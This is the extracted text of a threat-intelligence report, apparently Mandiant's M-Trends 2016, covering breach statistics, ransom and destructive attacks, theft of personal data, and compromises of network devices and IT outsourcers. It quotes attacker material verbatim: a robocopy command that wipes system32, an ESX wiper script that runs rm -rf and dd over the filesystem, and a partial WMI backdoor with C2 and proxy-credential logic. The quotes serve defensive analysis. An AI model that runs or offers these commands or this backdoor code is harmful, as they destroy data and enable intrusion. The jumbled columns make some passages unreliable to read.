You are on page 1of 48







Executive Summary 3

By the Numbers 6

2015 Trends
Trend 1: David v. Goliath: 9
The rise of business disruption attacks
Trend 2: This Time it’s Personal 16
Trend 3: Attacks on Enterprise Networking Devices 19

A Look Back, Trends Turned Constants

Outsourced Service Provider Abuse 22
Windows Persistence 28

The [re]Rise of Red Teaming 36

FaaS – Real-Time Adversary Detection and Response at Scale 44

Conclusion 47



1. More breaches became public than at any other
time in the past (both voluntarily and
involuntarily), and
2.The location and motives of the attackers were
more diverse.

In 2015, more breaches than ever before became public
knowledge. Suffice it to say that the security industry
Our clients’ privacy is
is changing because of new pressures being applied to of utmost importance
to us. Thus, as in all
these victim organizations. They now have to respond M-Trends reports, we
to the court of public opinion, as well as all other statutes, refrain from naming our
clients in this report,
regulations, and lawsuits that come with a breach. In some even if they have
chosen to publicly
of our incident responses, we saw companies take actions comment that they are
working with Mandiant.
based on external pressure that impacted their ability to
fully scope and successfully remediate the breach.

In 2015, the nature of the breaches we measured 416 days in 2012. Additionally, the
responded to continued to shift to a more median number was 205 days in 2014, which
even balance of Chinese and non-Chinese- means we witnessed a drop of more than 50
based threat actors. We responded to more days in 2015! Obviously, as an industry, we are
actors based out of Russia (both nationally getting better at detecting breaches.
sponsored and traditionally financially
motivated attack groups) than in the past. Even so, it’s clear that we have a long way
We also saw an uptick in “gunslinger” (for- to go. Mandiant’s Red Team, on average, is
profit) groups. Finally, we noticed a significant able to obtain access to domain administrator
increase in attack groups leveraging credentials within three days of gaining
deregulated currency (such as Bitcoin) to initial access to an environment. Once
get their ransoms paid. (See the section domain administrator credentials are stolen,
on business disruptive attacks for more it’s only a matter of time before an attacker
information on this). is able to locate and gain access to the
desired information. This means that, in
In this issue, we present our popular annual our experience, 146 days is at least 143 days
breach statistics, discuss three new trends too long. On a positive note, companies
that we have noticed, explore more in depth that detected the breach on their own had
“Trends Turned Constants”, and include a median number of 56 days compromised.
two additional articles to help support our The takeaway is that we are getting better as
interpretation of the numbers we present. an industry, but there is still work left to do!
The articles address the [re]Rise of Red
Teaming operations, and how our FireEye Mandiant recognizes that our median
as a Service (FaaS) service line is keeping number of days compromised is a skewed
companies safer and reducing the standard statistic, and has always been. This statistic is
number of days compromised. generated based on Mandiant’s experience
responding to breaches. Organizations that
Numbers always tell a story, but it’s the quickly detected a breach on their own,
interpretation of those numbers that holds or resolved the breach without Mandiant’s
the real value. The median number of days an involvement, are not included in the median
organization was compromised in 2015 before number of days compromised. Nevertheless,
the organization discovered the breach (or we think this metric’s trend over the years—if
was notified about the breach) was 146. This not the numbers themselves—is a useful way
continues a positive improvement since we first to measure progress in our industry.


The most interesting new trend in 2015 was an organization. Persistence is a topic we expect
increase in the number of disruptive attacks to continue see year after year, because
we responded to. Disruptive attacks can be persistence mechanisms are required for
those that hold data for ransom (such as an attacker to maintain long-term access
CryptoLocker), hold a company for ransom to an environment. We explored some
(stealing data and threatening to release it), new and creative persistence mechanisms
delete data or damage systems, add malicious that we discovered. Leveraging third-party
code to a source code repository, or modify service providers to gain access to a victim
critical business data in the hope that it does organization is a favored technique to gain
not get discovered. initial access because often the service
provider’s security posture is less than that
The second new trend we explore is the bulk of the victim organization. In addition, service
export of Personally Identifiable Information providers are often trusted entities, thus
(PII) from targeted companies by Chinese granting the attacker easy and trusted access
threat actors. Previously, we had seen to their intended target.
targeted theft of PII information, but not the
mass theft that we saw in 2015. All of the trends we’re seeing lead to one
conclusion: It is more critical to focus on all
The third new trend we encountered is the aspects of your security posture (people,
desire to exploit networking gear during a processes, and technology) than ever before.
targeted and persistent campaign. We’ve The information presented in this year’s
seen attackers compromise these devices in M-Trends should help provide justification for
order to maintain persistent access, to change the renewed focus.
security security access control lists (ACLs)
to grant access to a protected environment,
for reconnaissance purposes, and for network
traffic disruption.

The two trends that we see year after year,

which we termed “Trends Turned Constants”,
deal with persistence and the exploitation
of third parties to gain access to a victim


Mandiant Industries Targeted

Energy 1%

Agriculture and Forestry 1%

High Tech 13%
Telecommunications 2%

Government and International

Organizations 3% Business and
Services 11%
Legal Services 3%

Transportation 3%

Aerospace and Defense 5%

Media and
Entertainment 11%

Healthcare 5%

Construction and Financial Services

Engineering 6% and Insurance 10%

Biotechnology and
Pharmaceuticals 7%
Retail 10%

Education 8%


How Compromises Are Being Detected


External Notification
of Breach

Internal Discovery
of Breach

Median Time of Compromise to Discovery

All Mandiant Investigations in 2015 External Notification Internal Discovery

146 days 320 days 56 days

Day of Week of Spearphishing Frequency


Sunday 0%

Monday 11% Friday

Tuesday 11%
Day of week email was sent

Wednesday 29%

Thursday 20%
Friday 18%

Saturday 10%



0% 5% 10% 15% 20% 25% 30% 35%

Percentage of total spear phishing emails



100s 6 2.8M 4,000

Hundreds of clients Six global Security Network visibility for FireEye as a Service
in dozens of industry Operations Centers more than 4 million (FaaS) delivers service
verticals. providing constant hosts with full endpoint using almost four
detection and response. capability on 2.8 million thousand FireEye devices
of these hosts. globally through a mix of
• Milpitas, CA client-owned and FireEye-
• Reston, VA owned gear.
• Dublin, Ireland
• Singapore, Singapore
• Tokyo, Japan
• Sydney, Australia



Over the past year, Mandiant responded to incidents where attackers destroyed critical
business systems, leaked confidential data, held companies for ransom, and taunted
executives. Some attackers were motivated by money, some claimed to be retaliating for
political purposes, and others simply wanted to cause embarrassment.

The idea of a cyber-attack that the attacker’s cause. This is opposed being targeted, be it trade secrets,
is intended to disrupt business to the traditional “low and slow” intellectual property, customer records,
operations is no longer a farfetched techniques typically employed to payment information, or other sensitive
scenario. This past year has shown maintain access on corporate networks data. With disruptive attacks, the
disruptive attacks have a real effect and steal data without being detected. attackers take steps to draw attention
on organizations large and small. to their malicious activity or the
Some of these attacks were purposely These attacks resulted in a public information they have stolen.
carried out in public, and involved release of confidential data and,
leaking data or broadcasting ransom consequently, embarrassment and Disruptive attacks are likely to
demands in an attempt to embarrass reputational damage. In some cases, become an increasing trend given the
or damage the victims in some way. companies lost the capability to high impact and low cost. Disruptive
Conversely, we have seen cases where function as a business due to the cyber capabilities are sometimes
the attackers tried to remain private. crippling loss of critical systems. referred to as “asymmetric,” in that
These instances often involved a Side effects included executive they can cause a significant and
monetary ransom demand to prevent resignations, costly ransoms, and disproportionate amount of damage
the release of stolen data. expensive system rebuilds. without requiring attackers to possess
large amounts of resources or
This past year we saw an increasing Traditional targeted attacks are technical sophistication.
number of what can be considered carried out over time, with the
“disruptive” attacks. While almost all attacker usually taking steps to hide We have outlined four disruptive
successful attacks are disruptive on their malicious activity and remain scenarios that our clients have
some level, these attacks were meant undetected in the victim environment. experienced over the last year.
to bring attention to the attack or to This is true regardless of what is


Being held for ransom that some amount of sensitive data was not paid. Throughout the
was stolen and will be released investigation, the individual allowed
Over the past year, we’ve assisted an
publicly on a certain date unless a multiple ransom deadlines to slip.
increasing number of clients in dealing
ransom payment is made. We suspected that an employee may
with digital blackmail schemes.
have been involved, so we analyzed
These typically involved attackers
In these cases, the deadline never that employee’s system and found
threatening to publicly release stolen
allowed enough time for a proper evidence that suggested involvement.
data unless the demand for large
investigation to be conducted. Rather, The company and law enforcement
payments from the victim was met.
we focused on trying to determine interviewed the employee, and the
The ransom demand often came in
whether the attacker’s claims were staffer confessed that they were
the form of a decentralized digital
credible or not. In some cases we behind the ransom attempt. The
currency such as Bitcoin.
were able to prove that data loss employee was fired, the ransom was
actually occurred, and in other cases not paid, and no customer data was
In all cases we worked, with one
we were not able to prove data loss publicly released.
notable exception, the value of the
before the deadline.
ransom demand was commensurate
Although not typically the result
with the value of the stolen data.
The obvious next question is whether of targeted intrusions, we would
This helped ensure that companies
or not a victim organization should be remiss if we didn’t mention
would pay the ransom. If the ransom
pay the ransom. Each scenario is commodity ransomware such as
amount is too large, the attacker is
unique and needs to be approached CryptoLocker, which has impacted
likely to never be paid. In one notable
differently. As such, there is no direct tens of thousands of organizations
exception, the ransom demand was
answer we can provide. Even if a and individuals. Mandiant has received
inexplicably low, despite the attacker
victim organization pays the ransom, hundreds of calls from organizations
seeming to know the true value of the
there is always a chance the attacker and individuals whose files were
stolen data. This instance came under
will release the data anyway. encrypted with numerous ransomware
scrutiny by the victim company and
variants. These ransomware
law enforcement because an ulterior In one case, an individual claimed to
threats demonstrate the significant
motive was suspected. have access to thousands of customer
material impact that can occur in an
records from one of our clients.
Most of the ransom cases we automated, non-targeted manner.
The individual provided personal
responded to followed a common
information for a few customers as
approach. The attacker sent an email
proof, and threatened to publish the
to a company executive indicating
rest of the stolen data if a ransom


Destroying critical systems
We’ve investigated multiple incidents where attackers operations, but instead, they covertly stole credit card data,
wiped critical business systems and, in some cases, forced personal information, and intellectual property.
companies to rely on paper and telephone-based processes
for days or weeks as they recovered their systems and Other threat actors are motivated to overtly disrupt business
data. We have even seen attackers wipe system backup operations and cause embarrassment to their victims. The
infrastructure in an effort to keep victims offline longer. sophistication and capabilities of disruptive threat actors
ranges from possible amateurs to suspected nation states.
Most threat actors that we investigated over the years Here are some examples of the system wiping techniques
had the system-level privileges and access to destroy our that we’ve observed being used by attackers.
clients’ technology environments and shut down business

Example 1: An attacker created a scheduled task that deleted the Windows directory
using the Microsoft robocopy tool on critical systems within the environment.
The script first created a new directory called c:\emptydir that had no files.
Next, the script executed robocopy with command line switches to mirror the
directory tree from c:\emptydir to c:\windows\system32. Since there were
no files or directories in c:\emptydir, the contents in c:\windows\system32
were erased. In parallel with the robocopy execution, the script executed the
shutdown command that powered the system off after 30 minutes (1,800
seconds). When an administrator powered the impacted systems back on,
Windows failed to boot up. The scheduled task is shown below.

mkdir “C:\emptydir”
robocopy “C:\emptydir” “C:\windows\system32” /MIR | shutdown /s /t 1800

Example 2: An attacker with domain administrator-level access to a victim’s Active

Directory environment attempted to distribute ransomware through
scheduled tasks and Group Policy objects (GPOs). The attacker created
a scheduled task and pushed it onto the target systems via GPOs. The
scheduled task loaded a malicious script from the domain controller (DC).
The script then copied over an executable from the DC to the target
systems and executed it. The executable was designed to encrypt user files
(documents, photos, emails, backups, etc.) on the file system and instruct
the victim to visit a website that contained instructions to obtain the
decryption key.


Example 3: An attacker created multiple variants of malware designed to wipe
Windows systems based on the function of the system, and then
automatically spread to other systems in the network. For the Domain
Controller version, the malware delayed destruction for a period of time so
that the server could continue to provide Windows authentication services,
allowing the malware to spread more comprehensively.

Some other key differences of the malware versions included:

1. Workstation – killed the antivirus process and wrote a custom MBR to the disk.
2. Server – disabled terminal services.
3. Mail Server – stopped the mail service and disabled terminal services.
4. Domain Controllers - disabled terminal services and executed the wiper code after a
period of time to allow the malware to continue spreading.

Example 4: An attacker created a wiping script that differed for each Linux or Mac
system in the environment. For example, the script extract shown below
was designed to be executed on ESX servers to disable the server itself
and render any virtual machines running on the server inaccessible. The
script looked for large files and wrote zeros partially into the files. The
script then attempted to delete system files.

find / -type f -name “*.*” | grep -v “disks” | grep -v “\/dev” | awk ‘{print “ls
-l \”” $0 “\”” }’ |sh | awk ‘{if ($5>524288000) print “dd if=/dev/zero of=\”” $9
“\” bs=512k count=400 seek=400 conv=notrunc,noerror > /dev/null 2>&1 &”}’ | sh
sleep 1
rm -r -f /boot/* &
rm -r -f /vmfs/* &
rm -r -f /* &
rm -f /bin/* /sbin/* &

The script above can be interpreted as:

1. Search the entire filesystem for any filename that matches the regex *.*, does not have the
word “disks” in it, and does not have “/dev” in the path.
2. Checks if the file is greater than 524mb.
3. If file is greater, then seek 400 512kb blocks into the file and write 200mb of zeros.
4. Delete everything in /boot.
5. Delete all volumes under /vmfs.
6. Begin removing everything on the filesystem.
7. Remove important binaries from /sbin and /bin.


Publishing sensitive company data on able to get unauthorized content of literal translations of English
the Internet taken down quickly. Knowing that technical terms to Russian that would
We have worked with a number of reputable content sharing sites take be obvious to a Russian speaker. The
clients whose sensitive company down content quickly, threat actors poor translation and other technical
data was published on the Internet. In will also use other platforms such evidence observed during the
some cases, this was done because as ThePirateBay, other BitTorrent investigation led us to believe that
a ransom demand had not been met. trackers and peer-to-peer websites. it was likely the threat actor used
In other cases, it was done simply to language translation software when
Threat actors also sometimes reach communicating in Russian.
embarrass the organization.
out to the media in an attempt to
Threat actors commonly leverage increase public visibility and maximize Another case involved an attacker
popular sharing platforms such as the victim’s embarrassment before the who claimed to be unable to speak
Pastebin1 to publish their “manifesto.” content is taken down. the English language, but it soon
They may dump sensitive corporate became apparent that the actor
Attempting to deceive
information such as company emails, was an educated English speaker.
employee information, compromised Despite the bold nature of disruptive The attacker had initially been
credentials, and database dumps threat actors, they actually don’t want communicating through some type
directly on the site, or include links their true identity to be known out of of automatic translation software, but
to download the data from other file fear of retribution or criminal charges. they ended up switching to natural
sharing sites. English at times when convenient.
In one case, a threat actor
Threat actors may also leverage indicated he was from Russia and
photo-sharing websites to publish communicated in the Russian
screen captures, thus proving language. Our linguists analyzed the
they had access to our client’s quality of the language in multiple
environment. These sites have communications with the attacker. We
formal abuse reporting processes assessed the quality of the language
and many of our clients have been to be poor since there were instances

Pastebin is a public text sharing platform which does not require any form of registration before publishing.


Lessons learned from investigating disruptive breaches

Responding to disruptive breaches is challenging, and the time the attacker contacts the victim organization.
not easy to plan for given the dynamic nature of these Therefore, a different response to these incidents is
attacks and the attackers. Unlike breaches where a required. We’ve outlined ten lessons from our incident
containment plan may be able to stop an attacker response engagements that may help organizations
from stealing more information, in these disruptive deal with disruptive attacks:
instances the damage may have already been done by

1 2 3 4 5
IS ACTUALLY A YOU’RE DEALING You need to validate easy to get distracted. EVALUATE WHETHER
BREACH – Just because WITH A HUMAN and scope the breach Evaluate whether the TO ENGAGE THE
someone claimed they ADVERSARY – Humans as quickly as possible. tasks you are taking ATTACKER – Attackers
hacked you doesn’t can be unpredictable This may require the on will help mitigate, do not always expect
necessarily make it and they may react out team working nights detect, respond, or a response. Some will
true. Empty extortion of emotion. Carefully and weekends, so be contain the attack. move on if they did
attempts are not consider how the careful of fatigue and Remember that you’re not specifically target
uncommon. Examine adversary will react to burnout. You may need racing against the your organization
your environment your action or inaction. to approve emergency clock. Focus on the (consider situations
for evidence of They can become change requests within must-haves instead of where an attacker
compromise before more aggressive if they short order. the nice-to-haves, and exploited a vulnerability
paying the ransom. If get upset. They may understand that you across hundreds of
the attacker provided back down and allow may need to deploy a organizations). Other
data as proof, confirm for more time if they number of temporary attackers may get
that the data is real and believe you are trying to solutions to address the agitated due to the
determine if it came meet their demands. attack. lack of response. If you
from your environment. decide to respond,
limit the interactions
and carefully consider
everything you say.
Consider involving
law enforcement and
legal counsel in all


6 7 8 9 10
need forensic, legal, RANSOM – Understand YOUR BACKUPS – Most FOCUS ON IN A DIFFERENT
and public relations that paying the ransom organizations have BROADER SECURITY WAY – Don’t forget
support to get through may be the right option mature backup policies IMPROVEMENTS – to operationalize
a disruptive breach. in some scenarios, but so they can recover Regardless of the and enhance the
Identify partners before there are no guarantees quickly in the event of a outcome, you should temporary solutions
the breach and get the attackers won’t system failure. However, ensure that the attacker that were deployed to
them on retainer. come back for more it’s common for the cannot come back in immediately address
money or simply leak systems containing and do more damage. the attack. Conduct
the data anyway. backups to be part of You also don’t want penetration testing and
Include experts in the same environment a second attacker Red Team assessments
the decision-making compromised by the targeting you because to validate your security
process and understand attacker. Tighten they think you are controls, identify
the risks associated with access to your backup willing to pay a ransom. vulnerabilities, and fix
all options. environment to mitigate Ensure you understand them immediately.
the risk of an attacker the full extent of the
accessing the system breach and implement
using compromised both tactical and
credentials and strategic actions to
destroying your prevent future attackers
backups. from gaining access.

over the last few years have altered the notion
Disruptive attacks were once considered an of what comprises a worst-case scenario. As
implausible worst-case scenario for many we’ve seen over the past year, disruptive attacks
companies and were typically not planned for have become a legitimate issue and businesses
by executives. Put simply, no one previously will have to begin planning and preparing
expected to have half the workforce lose accordingly. The best-case scenario when
access to their computers within a short experiencing a disruptive attack is that you are
amount of time. However, public events well prepared and able to minimize the damage.




Over the past year, Mandiant responded to several targeted
attacks that resulted in the theft of Personally Identifiable
Information (PII) by threat actors linked to China. In these cases,
the volume of PII stolen indicated that the objective was the mass
collection of PII data, not just that of specific individuals.

In our years of responding to incidents The breaches we investigated spanned

involving China-based threat actors, Mandiant multiple sectors, including healthcare, travel,
had not observed a trend of indiscriminate financial services, and government. While
theft of PII; however, we were aware of one-off we initially suspected the threat actors
instances of PII theft occurring as a byproduct would target health records and credit card
of larger data theft operations (for example, information, we found no evidence. Instead,
stealing all data on a file server, including PII we observed the threat actors target and
that may not have been of particular interest steal information that could be used to
to the attacker). verify identities such as Social Security
numbers, mothers’ maiden names, birthdates,
Our view changed last year as we investigated employment history, and challenge/response
several massive PII breaches that we believe questions and answers.
were orchestrated by threat actors operating
in China.



Examining how a China-based threat actor stole vast amounts of PII.

Phishing attacks continue to be a theme The threat actor demonstrated an

year after year, and this case is no different. understanding of database systems from
It began with a threat actor successfully Microsoft, Teradata, and Oracle, as well as the
enticing a user to follow a malicious link transaction gateways used to access these
in a phishing email. The link downloaded a systems. With the database information in
backdoor, providing the threat actor access hand, the threat actor systematically tested
to the victim’s environment. Once the threat authentication and inventoried databases.
actor obtained a foothold, the reconnaissance The threat actor then searched the database
activity was primarily centered on the tables for column names that indicated they
identification of databases with the greatest contained sensitive information, such as Social
volume of PII. Security numbers.

The threat actor gained access to the Once the threat actor found the information
databases by leveraging the victim’s Active of interest, specific fields for every record in
Directory information to identify database the targeted databases were extracted. The
administrators and their computers. information included Social Security numbers,
Specifically, the attacker searched Active mothers’ maiden names, and dates of birth.
Directory group membership for the Due to the volume of information extracted,
keyword “database.” The threat actor moved the threat actor would:
laterally to those systems and harvested
documentation in an attempt to identify the 1. Extract information in chunks
names of databases, database servers, and (100,000 to 1,000,000 records at a time).
database credentials. 2. Compress the information into
split archives.
• Upload the compressed files containing
PII to file sharing sites.

1. The threat actor queries database to
identify columns with PII.

2. After identifying PII, the attacker breaks

up the queries into manageable chunks.

3. The threat actor compresses and

uploads the harvested PII data to
publically available file sharing sites.


Potential Motivations for Targeting PII Mitigate and Detect Targeted Threats
through Enhanced Security Controls
The targeting of PII by China-based threat
actors raised questions, specifically as to how Combating targeted threats requires executive
a country could benefit from this information. support, effective policies and procedures, and
This was especially true for threat actors who preventative and detective security controls.
had historically targeted information related When implemented correctly, a defense-
to research and development or mergers in-depth approach provides organizations
and acquisitions. While Mandiant has not yet with the ability to reduce risks to its sensitive
seen how these threat actors are leveraging information – PII, in this case. The following
the stolen PII, potential motivations of controls were identified as a common thread
China-based threat actors could include the for organizations that suffered PII breaches:
Locate critical information
Bypassing Identify Verification and Access To make decisions about encryption, network
Management Schemes segmentation, and user rights restrictions
Given the type of PII the attacker stole, (all at the core of computer security),
threat actors could circumvent user identify organizations must first know where critical
verification and management processes. We information resides in their environment.
commonly see threat actors use legitimate
Encrypt sensitive information stored in
user accounts that already exist in the
environment. Access to this type of PII could
Consider implementing both transparent
allow a threat actor to successfully navigate
database encryption (TDE) and application
knowledge-based security mechanisms
layer encryption for databases storing
(knowing the correct response to personal
sensitive information.
questions only the employee is assumed to
know) and compromise existing accounts. Restrict network access to database servers
Implement network Access Control Lists
Facilitating “Traditional” Espionage
(ACLs) to limit access to database servers.
Operations & Identifying and Recruiting
Insider Threats and Subject Matter Experts Only systems on trusted and well monitored
A government may target PII to assist in the network segments should be permitted to
recruitment of human intelligence assets. establish connections directly to database
Knowledge of an individual’s financial situation, servers.
ideology, and susceptibility to blackmail
could increase the success of a government’s
recruiting efforts. Mandiant continues to monitor targeted threat
actors and track their evolution to include the
Targeting Specific Populations progression of the data being targeting. We
Access to vast amounts of PII may assist a expect China-based threat actors will continue
government in identifying and monitoring targeting and steal PII from organizations.
persons of interest to the government. We While the specifics on motivations are still
have previously observed China-based emerging, it is reasonable to assume the trend
threat actors target dissidents, minorities, will continue and PII will be at risk.
foreign journalists, nonprofit employees, and
other individuals considered a threat to the
Communist Party’s image and legitimacy.



Over the past several years, Mandiant has observed advanced threat actors compromise
networking device infrastructure such as a routers, switches, and firewalls. These devices
are critical components of enterprise infrastructures and are often overlooked by incident
responders during an investigation, especially when they have identified other backdoors
or means of remote access used by the threat actors.

Why attackers target networking devices • Subversion of Security Controls: Threat actors could
modify or disable security controls of networking
There are numerous reasons why a threat actor would
devices. Examples of these security control
target network infrastructure, given the critical role these
subversions include opening routes or modifying ACLs
devices play in a network. Some examples are:
or firewall rules to allow traffic for command and
• Traffic Monitoring: Network devices may offer an control or interactive accesses. Threat actors can also
opportunity to monitor traffic within and across modify or subvert secure tunnels or segmentation,
network segments. This may allow access to data from reroute traffic for monitoring, or modify sessions to
numerous computers that would otherwise require man-in-the-middle communications.
threat actors to compromise multiple individual hosts. • Persistence: Threat actors might install a backdoor
• Reconnaissance: Similar to traffic monitoring, threat directly on the networking device that gives them
actors could use router and firewall access to collect direct access to the network.
information for further system/network targeting • Disruption: Threat actors could modify or disable
and lateral movement. This could range from features on the network devices to disrupt
dumping existing reconnaissance data (e.g. routing communications on the device and cause a denial
tables and similar) or active data collection to map of service.
the network and devices, authentication and other
critical systems, etc.


Networking devices are challenging to devices, but it is possible the attacker chose
investigate due in part to a lack of tools that to be as stealthy as possible by waiting for an
can either detect a compromise or facilitate administrator to accidentally install one of the
a forensic review. During an intrusion, manual maliciously modified images – rather than do
analysis of these devices is time-consuming it themselves.
and inefficient. Furthermore, most enterprise
Cross-Site Scripting a Cisco ASA VPN
networks have dozens or hundreds of these
devices, each with complex rule sets and
varying software versions. This makes analysis A threat actor used a pre-authentication
at scale extremely difficult. cross-site scripting (XSS) attack against Cisco
ASA VPN devices, a vulnerability identified as
Investigation of networking devices is often CVE-2014-3393. The threat actor exploited this
also not a priority when an attacker has access vulnerability to append malicious JavaScript
to sensitive data in an environment. While the to the company’s logo on the SSL VPN landing
level of sophistication needed to compromise page. This malicious script silently captured
these devices is often high, attackers know credentials of users that used a web browser
that if they are successful, their attack will be to initiate their SSL VPN session and posted
difficult to detect. them to a site controlled by the threat actor.
The organization did not require a second
Examples of Attacks on Networking Devices
factor for authentication to the VPN, so the
The following are examples of attacks against threat actor was able to use credentials
networking infrastructure that Mandiant has harvested by the malicious script to log into
observed over the past few years: the corporate network using the VPN.

Modification of Cisco Router Images During our testing to understand the severity of
Mandiant observed threat actor compromise this issue, we discovered that this attack could
a telecommunications company. During the be performed even if two-factor authentication
intrusion, the threat actor discovered on an was required on the Cisco ASA device. We
internal network file share a repository of the were able to harvest session information, as
various Cisco router images the company used well as legitimate credentials, which allowed us
for its routers. The threat actor transferred to perform a traffic replay attack.
these images out of the environment, modified
Cisco IOS Router Backdoors: SYNFUL Knock
them to include a backdoor, and then replaced
the legitimate images on the file share with In 2015, Mandiant released a report detailing
the malicious images. The threat actor then the modification of network border routers
used anti-forensics techniques to modify running Cisco IOS with an implant named
the timestamps of the malicious images in SYNful Knock. The implant consists of a
the repository so that they matched the modified Cisco IOS image that permits
timestamps of the legitimate images. the threat actor to load modules to the
router containing new functionality directly
Mandiant discovered that multiple routers in from the Internet. The modification of the
the environment were running the malicious router images discovered by Mandiant was
image and, importantly, that the activity had persistent even after a reboot and allowed
occurred more than half a year prior to the a threat actor to log into the compromised
investigation. There was not enough forensic devices from the Internet.
evidence to determine whether it was the
threat actor or systems administrators who
had installed the malicious image on the


Mandiant confirmed the existence of 14 • Change Management: Ensure that
SYNful Knock router implants on Internet- network administrators keep detailed
facing infrastructure in four different logs on changes made to the networking
countries: Ukraine, Philippines, Mexico, and device infrastructure. Organizations can
India. Further research by others found that accomplish this by establishing a change
many more routers had been compromised management process and implementing a
around the world. change ticketing system.
• Patch Management: Ensure that devices
Tactical Recommendations
are running with the vendor’s latest
As with other systems in an environment, patches. Always download patches
integrity monitoring and authentication directly from the vendor and verify hashes
management are critical in preventing or or digital signatures of the patches before
detecting an attack on networking devices. applying them to devices.
Mandiant recommends the following actions • Recovery: Store known-good
to aid organizations in preventing, detecting, configurations in a secure location so
and recovering from an intrusion involving the that they can be used to recover from
compromise of networking devices: a compromise. Periodically check the
images installed on networking devices to
• Strong Authentication: Enforce multi- determine if the image on a networking
factor authentication for administrative device has been altered.
access to the networking devices. Use a • Monitoring: Maintain awareness of devices
system that relies on hardware tokens, with performance issues that may be
SMS, or a smartphone application rather evidence of compromise.
than a workstation-based “softoken”
• System Integrity Verification: Periodically
check running configurations on
networking devices and ensure that
they conform to the boot image. Threat
attackers might compromise the running
image of a networking device with
modifications that may not persist after


Mandiant continued to observe advanced
attack groups leveraging outsourced service
providers to intrude onto the networks of
our customers. This topic should sound
familiar; in 2013, Mandiant’s M-Trends report2
included an article and case study about
how advanced attack groups were observed
increasingly taking advantage of outsourcing
relationships in order to gain access to
companies that employed those services.
This trend has grown, and is possibly more
prevalent today as an rising number of
organizations become increasingly reliant on
their outsourced service providers.

M-Trends 2013 (


Compromise via outsourced service provider (OSP)

1 OSP has access to client network through site-to-site VPN tunnel.

Limited access restrictions are in place.

Outsource Service Provider Client Network

2 Attacker compromises OSP


3 Attacker leverages site-to-site VPN tunnel and

compromises client from OSP network.

The Takeaway
Your network is only as secure as your outsourced service provider. Make sure your organization understands the
security of these providers, and apply as stringent policies to their access as you would to your own employees.


Outsourced service provider abuse was Our investigations revealed that attackers
observed in several forms throughout 2015. were maintaining access to the ITOs by
We investigated cases involving financially gaining access to the ITO management servers
motivated attackers leveraging stolen that these service providers use to support
credentials from third-party service providers their clients’ infrastructure. From there, the
to access retail and hospitality networks and attackers performed reconnaissance and
steal payment card data, a continuing trend harvested credentials that enabled them to
that has been widely reported over the last access the targeted companies’ systems. The
few years and has not shown any signs of attackers occasionally deployed malware
decreasing. inside the end-client (victim) networks as
an additional persistence mechanism, but
We also witnessed attackers indirectly primarily leveraged the elevated privileges of
leveraging outsourced service providers for the ITO administrators to move throughout
access by stealing credentials left behind in the victim networks undetected.
unsecured files on victim systems. While it is
true that the attacker already had access to In a recent investigation, Mandiant identified
the victim environment, it was the outsourced an attacker leveraging WMI3 malware for
service provider credentials that allowed the persistence that spanned the ITO network
attacker to interact with the target segment along with multiple victim organizations. The
of the victim’s environment. In one case we usage of WMI for persistence is considered
worked, the attacker found a spreadsheet an interesting technique and advanced
with usernames and passwords to a protected attackers are increasingly favoring it, so
network segment. Unfortunately, this identifying its usage in ITO investigations
protected network segment allowed remote marks the convergence of two trends. Last
single-factor access to the environment. The year, Mandiant’s M-Trends report provided
attacker simply leveraged the credentials they an overview of WMI and how attackers were
had stolen to authenticate to the segmented observed leveraging this technique for lateral
environment, accessed systems processing movement and persistence. Additionally,
cardholder data, and continuously harvested In August 20154, the FireEye FLARE team
that data until we contained the incident. published a whitepaper that dives deep into
the architecture of WMI, reveals case studies of
The most damaging outsourced service attacker use of WMI in the wild, describes WMI
provider abuses we saw this past year were attack mitigation strategies, and shows how to
related to the IT outsourcing (ITO) industry. mine its repository for forensic artifacts.
By working with victim organizations and
their outsourced IT service providers, we This particular malware was unique not only
have identified multiple advanced attack because it was WMI-based, but also because
groups that have persisted across various it leveraged a dead-drop resolver technique
ITO infrastructures for more than at least two that communicated with malicious profiles
years – and five years in one instance. The created on the Microsoft TechNet web portal;
attackers were maintaining persistence to the a technique that FireEye described in a threat
ITOs and leveraging them for unrestrained intelligence report published in May 2015
access into the targeted companies that (Hiding in Plain Sight: FireEye and Microsoft
employ the outsourced services. The goals Expose Chinese APT Group’s Obfuscation
of the attackers varied for each of the end- Tactic).
client victims, but the actors were primarily
focused on stealing sensitive data from those
organizations while maintaining access to the
ITO infrastructure for additional campaigns
targeting other companies.

M-Trends 2015 – Overview of WMI (
Windows Management Instrumentation (WMI) Offense, Defense, and Forensics (


Advanced threat actors can use WMI for nearly every phase of the Targeted Attack Lifecycle.
By default, using WMI leaves little evidence for forensic investigators to find, unless they know
where to look. In this particular instance, not only was WMI used to defeat traditional antivirus
software, it was also used to bypass the victim’s web proxy by using hard-coded credentials
that had been stolen from an ITO user. The following code snippet depicts an example of WMI
malware recovered from a recent ITO investigation.

instance of ActiveScriptEventConsumer as $Consumer

Name = “MST.ConsumerScripts”;
ScriptingEngine = “JScript”;
ScriptText = “oFS = new ActiveXObject(‘Scripting.FileSystemObject’);JF=’C:/Windows/Temp/%Mutex%’;oMutexFile =
null;try{oMutexFile = oFS.OpenTextFile(JF, 2, true);}catch(e){}”
“CoreCode = ‘ %6D%61%73%74%65%72%55%72%6C%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%73%6F%63%69%61%6C

The hex encoded portion of the script in this file decoded to the text shown below. This encoded
text contained the URL from which the malware downloaded commands and a hard-coded
victim proxy address with authentication credentials that had been stolen from the ITO.

masterUrl = [‘<REDACTED>’]; var Proxy = [<PROXY_REDACTED>:80’,’<ITO_US-

ER>’,’<ITO_USER_PASSWORD>’]; callUrl = ‘’; vAuth = ‘’; gSleep = 1000 * 60 * 72; vSleep = 500; XML = new ActiveXOb-
ject(‘MSXML2.ServerXMLHTTP.6.0’); oWS = new ActiveXObject(‘WScript.Shell’); oNt = new ActiveXObject(‘WScript.Net-
work’); locator = new ActiveXObject(‘WbemScripting.SWbemLocator’); oWMI = locator.ConnectServer(‘.’, ‘root\\cimv2’);
oFS = new ActiveXObject(‘Scripting.FileSystemObject’); var Base64 = { _keyStr : “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi-
jklmnopqrstuvwxyz0123456789+/=”, encode : function (input) { var output = “”; var chr1, chr2, chr3, enc1, enc2, enc3,
enc4; var i = 0; input = Base64._utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 =
input.charCodeAt(i++); chr3 =


The following diagram depicts how advanced attack groups maintain
their persistence inside ITO infrastructure.

Figure 2 – Attack Diagram

Threat Actor

Microsoft TechNet C2



Hijacked ITO
Admin Account

WMI Remote
access Trojan

Company A Company B Company C

Compromised Host Compromised Host Compromised Host

Sensitive data Sensitive data WMI Remote

access Trojan


